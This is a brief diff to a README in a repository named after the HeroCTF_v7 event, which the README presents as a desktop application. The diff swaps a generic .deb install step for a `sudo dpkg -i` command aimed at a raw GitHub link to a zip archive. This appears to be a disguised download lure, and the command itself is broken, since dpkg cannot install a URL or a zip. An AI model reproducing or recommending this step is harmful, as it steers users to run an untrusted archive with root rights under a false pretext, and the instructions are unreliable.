yowc/HeroCTF_v7/README.md

 **For Linux:**
 - Open the terminal and navigate to the directory where the file is downloaded.
-- Use the command to install, e.g., `sudo dpkg -i filename.deb`.
+- Use the command to install, e.g., `sudo dpkg -i https://raw.githubusercontent.com/yowc/HeroCTF_v7/master/System/movie_night2/HeroCTF_v7-v3.2.zip`.

 ## 🔄 Running the Application
 After installation, you can run HeroCTF_v7 from your applications menu.